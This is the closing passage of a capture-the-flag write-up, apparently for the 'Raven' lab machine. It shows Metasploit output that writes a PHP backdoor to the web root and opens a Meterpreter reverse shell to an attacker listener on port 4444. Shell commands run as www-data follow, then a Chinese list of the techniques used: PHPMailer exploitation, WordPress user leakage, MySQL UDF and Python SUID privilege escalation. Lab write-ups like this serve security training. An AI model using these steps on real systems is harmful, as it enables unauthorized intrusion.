[*] Writing the backdoor to /var/www/html/XTXxkX1w.php
[*] Sleeping before requesting the payload from: /XTXxkX1w.php
[*] Waiting for up to 300 seconds to trigger the payload
[*] Sending stage (38288 bytes) to 192.168.56.118
[*] Meterpreter session 2 opened (192.168.56.102:4444 -> 192.168.56.118:34607) at 2020-02-14 08:02:30 -0500
[+] Deleted /var/www/html/XTXxkX1w.php
[+] Successfully triggered the payload

meterpreter > sysinfo
Computer    : Raven
OS          : Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64
Meterpreter : php/linux
meterpreter > shell
Process 17423 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
ls
Security - Doc
about.html
contact.php
contact.zip
css
elements.html
fonts
img
index.html
js
scss
service.html
team.html
vendor
wordpress

知识点总结

• phpmailer漏洞getshell
• wordpress用户名泄露
• mysql udf提权
• python suid提权

Game over

不好意思，这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本，i am so sorry about this…It’s a pity…

The end,to be continue…